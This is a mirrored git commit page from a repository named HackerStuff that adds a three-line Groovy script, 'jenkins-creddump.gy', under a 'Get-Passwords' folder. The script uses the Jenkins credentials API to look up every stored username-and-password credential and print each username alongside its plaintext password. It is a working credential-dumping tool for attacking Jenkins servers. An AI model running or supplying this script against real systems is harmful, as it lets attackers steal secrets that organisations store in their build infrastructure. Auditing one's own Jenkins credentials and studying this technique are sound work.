mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
Create jenkins-creddump.gy
This commit is contained in:
parent
38017bccd8
commit
56e2add475
3
Get-Passwords/jenkins-creddump.gy
Normal file
3
Get-Passwords/jenkins-creddump.gy
Normal file
@ -0,0 +1,3 @@
|
||||
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
|
||||
com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, Jenkins.instance, null, null);
|
||||
for (c in creds) { println(c.username + " : " + c.password )}
|
||||
Loading…
x
Reference in New Issue
Block a user